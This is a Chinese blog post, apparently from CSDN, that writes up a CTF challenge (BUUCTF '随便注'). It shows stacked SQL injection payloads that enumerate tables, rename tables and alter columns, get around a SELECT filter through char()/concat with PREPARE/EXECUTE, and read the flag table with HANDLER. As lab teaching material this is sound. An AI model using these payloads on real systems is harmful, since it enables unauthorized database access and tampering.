mysql_char ctf_buuctf_sql注入_随便注1

最新推荐文章于 2024-04-19 18:32:25 发布
最新推荐文章于 2024-04-19 18:32:25 发布
阅读量278 收藏 1
点赞数
文章标签: mysql_char ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34299849/article/details/113970675
版权

题目:随便注1

知识点:

渗透相关知识:

1.堆叠注入

2.猜解查询语句

3.闭合sql语句的测试方法

常规的sql语句:

1.desc table:显示表结构

2.show tables/show tables:显示所有表

预处理语句:

1.set 变量名=xxx:创建变量

2.concat():可以拼接绕过字符过滤,执行sql方法,制造出目标的字符串

3.prepare 语句名=字符串名:预处理,字符串赋值给语句并执行

4.excute 语句名:执行prepare创建出的语句

题面:

d5a80f89ba86b723ef777de0d929c22b.png

解题步骤:

1.直接提交1,返回了一个php数组形式的返回值,说明有回显。

f9f10d20f90e361cfc70e45e2d9913a7.png

2.尝试使用 '、"、]、) 等闭合sql语句,发现单引号引起报错,

a5474d507c74d4493454468e0bc55c87.png

3.尝试万能密码‘ or 1=1#,根据回显内容,发现flag不在当前所在的表中,这说明需要利用注入语句切换当前所在的表。

464ab934dc883a2652213e7babad5176.png

4.首先查询所有的表名,1';desc tables;#; 发现当前库中存在两个表

dc608153d3e4ecba07040f11ac39d7ca.png

5.分别查看两个表结构

1';desc `1919810931114514`;#

1';desc `words`;#

发现flag存在于表1919810931114514中

c407542a2795e3400b95a93b5f450e68.png

6.现在目标明确,要查询表1919810931114514中的flag

1';select * from `1919810931114514`;#

执行后发现存在过滤,无法使用select。

723f0a84683280646f683dd2ba0edd59.png

7.到这一步为止可以有多种解法

法一:

对查询语句进行猜解,猜测查询语句如下:

select * from `words` where id = '$inject';

或者

select id,data from `words` where id='$inject';

如此看来目前我们要查询1919810931114514表,而目前可利用的select语句执行在words表,且无法使用堆叠注入执行新的select语句,这就陷入了死循环。

重新分析一下,已有的select语句其实在本题中是可以多次执行的,每次执行不影响表结构,其功能是查询words表中的全部内容。所以我们如果能想办法利用一个堆叠注入将1919810931114514表中的内容转移到words中,然后再使用一次万能密码(’or 1=1#),就可以得到flag。

复制语句大概长这样

insert into `words` select * from `1919810931114514`

不行insert肯定会被过滤掉,换个思路,其实我还可以把1919810931114514表名改了。

说搞就搞。

1';rename table `words` to `meiyong`;rename table `1919810931114514` to `words`;#

4c09f81bb31f3302f10e183da6e38efa.png

搞砸了,大概是没有加表名没有``,再来一次,返回结果有变化,但仍然是报错。报错内容提醒我,1919810931114514中本身没有id列,会翻车。

eb6107071146cd8a66a9711cc846d153.png

重置环境重来,把flag列名改成id,执行没有回显,说明语句顺利执行了。

1';rename table `words` to `meiyong`;rename table `1919810931114514` to `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) ;#

接着再执行万能密码,得到flag。

1‘or 1=1;

a55bb86c7ec276a80fce5faf555e5e90.png

法二:

我们知道只要绕过select语句,即可查询到目标表。这里可以预定义一个语句,利用concat拼接,然后执行查询目标。可以作为通法值得研究。我尝试的方法有两种:

(1).利用char()绕过

1';SET @sql=concat(char(115,101,108,101,99,116)," * from `1919810931114514`");PREPARE sqla from @sql;EXECUTE sqla;#

解析:

#闭合前面的语句

1';

#利用concat拼接出目标语句,char()方法绕过select

SET @sql=concat(char(115,101,108,101,99,116)," * from `1919810931114514`");

#利用prepare预定义一个语句,并将它赋给 sqla

PREPARE sqla from @sql;

#执行预定义的语句

EXECUTE sqla;#

(2).利用拼接绕过

payload:

1';

set @sql=CONCAT('se','lect * from `1919810931114514`;');

prepare stmt from @sql;

execute stmt;

解析:

#闭合前面的语句

1';

#利用concat拼接出目标语句,拼接绕过select

set @sql=CONCAT('se','lect * from `1919810931114514`;');

#利用prepare预定义一个语句,并将它赋给 sqla

PREPARE sqla from @sql;

#执行预定义的语句

EXECUTE sqla;#

下面是一段常见的存储过程可以参考语法,理解为什么存储过程要有set、prepare、execute 几步。

set @_sql = 'select ? + ?';

set @a = 5;

set @b = 6;

PREPARE stmt from @_sql; // 预定义sql

EXECUTE stmt USING @a,@b;// 传入两个会话变量来填充sql中的 ?

法三:

利用handler语句

该方法直接摘自大佬

mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。

HANDLER tbl_name OPEN [ [AS] alias]

# 打开一张表,无返回结果,实际上声明了一个名为tb1_name的句柄。

HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)

[ WHERE where_condition ] [LIMIT ... ]

HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }

[ WHERE where_condition ] [LIMIT ... ]

HANDLER tbl_name READ { FIRST | NEXT }

[ WHERE where_condition ] [LIMIT ... ]

# 获取句柄的第一行,通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。

HANDLER tbl_name CLOSE

# 关闭打开的句柄。

payload:

1';

handler `1919810931114514` open;

handler `1919810931114514` read first;-- +

总结:在监工短短的督促下,这道题的总结终于东拼西凑写完了。我还很菜,文章中内容很多都是摘自大佬们,其中有些知识点我的理解也许不对,不确定的这部分我写的比较繁琐详细,希望能与大家交流。

折柳为信
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
1. 更新 Shiro 到最新版本:Apache Shiro 通常会在发现此类漏洞后发布修复更新,因此确保使用的是最新版本是最基本的防护措施。 2. 配置序列化策略:限制允许反序列化的类,只接受可信的序列化数据,避免未经验证的...
BUUCTF [强网杯 2019]随便 1(两种方法)
m0_62879498的博客
03-05 1万+
[强网杯 2019]随便 1 第一步,先判断入点的传参方式,发现是get传参。 第二步,判断闭合方式: 1’and 1=1-- q 1’and 1=2-- q 说明闭合方式为 单引号 如果输入1“and 1=1-- q 和1”and 1=2-- q 两次的回显结果一样,说明闭合方式不是 双引号 其他同理 第三步,判断是否有关键字过滤: 先直接输入: select 查看回显,发现: 发现本题过滤关键字:/select|update|delete|drop|insert|where|\.而且不区分
[强网杯 2019]随便1 解题思路(详细版)
qq_61861243的博客
09-24 266
1、首先通过题目,及页面提示,考虑到题目应该利用sql注入进行解决,首先试一下万能密码,查看一下回显内容2、既然这样我们就查询一下数据库中的所有表格1';#,这里我们可以得到两个表格words、19198109311145144、查看一下两个表格的信息, 1';#查询words表找到了两个属性一个id 一个data;1';#查询1919810931114514表我们发现有关flag的提示词。3、根据上一步题目查询我们可以推测出页面在所有访问过程中的回显,都是回显的words的内容。
BUUCTF关于sql注入的题目
最新发布
2302_80935968的博客
04-19 758
测试的时候输入了 1’ and ‘1’='1这个有问题的payload,看报错信息中带有一个 and password=‘1’ and ‘1’=1 说明sql语句是SELECT * FROM tables WHERE username=‘1’ and ‘1’=1 and password=‘1’ and ‘1’=1 类似这样的查询,and 的两边同时为TRUE 结果才能为 TRUE,所以输入的payload一定要符合这个条件就可以登录成功了。(select 输入数据 || flag from Flag)
[强网杯 2019]随便 1【SQL注入】解析过程
旺仔Sec&blog
05-31 844
[强网杯 2019]随便 1【SQL注入】解析过程
BUUCTF】[强网杯 2019]随便 1
qq_45972928的博客
05-06 3959
这是一个典型的sql注入题目 知识点: 1、入点检测 2、万能匹配 3、暴力获得数据表和其属性 4、sql语句的掌握(order by; union select; rename table; alter table…等等) 1、进入网站 2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况 经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示 3、测试是否存在入 and 1=1和and 1=2没有变化 在参数后面加单引号,发现错误,可以尝试进行入 4、尝试0‘ or
buuctf [强网杯 2019]随便 1
热门推荐
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql注入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql注入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
hac.zip_CTF信息隐写_ctf
09-23
【标题】"hac.zip_CTF信息隐写_ctf"是一个关于CTF(Capture The Flag)比赛中的信息隐写技术的入门教程。CTF是一种网络安全竞赛,参赛者通过解决各种安全问题来获取“旗标”或关键信息,以此赢得比赛。而信息隐写则...
QR_Research
10-09
1. **二维码技术**:二维码(Quick Response Code)是一种二维条形码,存储的信息量远超一维条形码,可包含文字、网址、电话号码、电子邮件等多种类型的数据。二维码技术广泛应用于产品追溯、广告推送、电子支付等...
SQL注入基础
qq_74259765的博客
07-05 203
sql注入一些个人笔记
[强网杯 2019]随便 1
tomatoff的博客
03-14 2817
1、登录页面: 2、直接提交1: 3、提交1’: 4、提交1": 5、由输入为1’时报错,所以猜测结果语句应该为单引号闭合; 所以提交a’ or ‘1’=‘1,获得: 6、后面不太会了,参考了大佬的文章: [强网杯2019]随便(初学者看过来) 7、先学习下再补充自己的理解 ...
[强网杯 2019]随便 1(SQL堆叠入+修改数据库+预处理语句+concat拼接)
Home to come
08-17 934
本文属于个人刷题记录,不会完全描述步骤,而是写自己感触深的知识点。 1.堆叠入原理(stacked injection)   在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠入。 1.1与union查询区别   而union injection(联合入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠
[强网杯 2019]随便
ChanCherry的博客
11-19 987
很感谢可以在BUU平台上复现这道题,感谢赵师傅!这篇wp借鉴了大佬的,为了自己日后学习需要就写了,大佬不喜勿喷QAQ 首先要知道堆叠入的原理: 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠入。而union injection(联合入)也是将两条语句合并在一起,两者之间有什么区别么...
【学习笔记 23】 buu [强网杯 2019]随便
weixin_43553654的博客
07-26 273
0x00 知识点 1.堆叠入 2.利用rename,alter的sql命令完成数据库操作 0x01 详解 1.什么是堆叠入? 堆叠入就是利用sql命令中利用“;”来做一句sql命令的结束标志,但是在“;”后的同一行里添加其他sql命令仍可以执行。 2.堆叠入与union injection(联合入)之间的区别? 区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠入可以执行的是任意的语句。 3.堆叠入的局限性? 堆叠入并不是在每种情况下都能使用的。
[强网杯 2019]随便 —— 堆叠
weixin_46962006的博客
12-12 2463
                       [强网杯 2019]随便 1 前言        个人观点,若有误请指教 解题思路及步骤 直接上’引号,结果直接报错了,证明存在sql注入漏洞。 判断当前表一共有几列,可得一共两列 获得当前表的内容,很明显当前表没有flag :是不是很蒙?竟然可以直接获得当前表的内容,那我干嘛还要在上面测试表有多少列?其实不是的,你在网页看到一共有几列就证明在数据库中的当前表就只有几列吗?就不能少几列给你看?当然,这道确实显示的列数和在数据库的当前表
buucrf-web-随便
weixin_43345082的博客
08-16 980
又学到个姿势 这道题是sql堆叠入 堆叠入自行百度 同时有过滤 做法是使用mysql预定义语句 PREPARE stmt from '你的sql语句'; EXECUTE stmt (如果sql有参数的话, USING xxx,xxx); // 这里USING的只能是会话变量 DEALLOCATE PREPARE stmt; 这三句话分别就是: 预定义好sql语句 执行预定义的sql 释放...
welcome_CAT_CTF
07-28
根据引用\[1\]中的描述,"welcome_CAT_CTF"是一个题目中的关键点,通过控制@的移动和输入j来增加猫币,当猫币大于100000000时可以获得flag。而根据引用\[2\]中的描述,flag可能隐藏在osu游戏的谱面中,需要打开osz文件进行查看。另外,引用\[3\]中提到了一个流量包的解压密码是伪加密的,可以通过修改文件来正常解压。综合这些信息,我无法直接回答"welcome_CAT_CTF"的具体含义或解法,因为缺少相关的引用内容。请提供更多的引用内容或提供更具体的问题,我将尽力帮助您。 #### 引用[.reference_title] - *1* [【nepnep&cat ctf】welcome_CAT_CTF](https://blog.csdn.net/qq_42220888/article/details/128531498)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [NepCTF2022 WP](https://blog.csdn.net/not_code_god/article/details/125883979)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值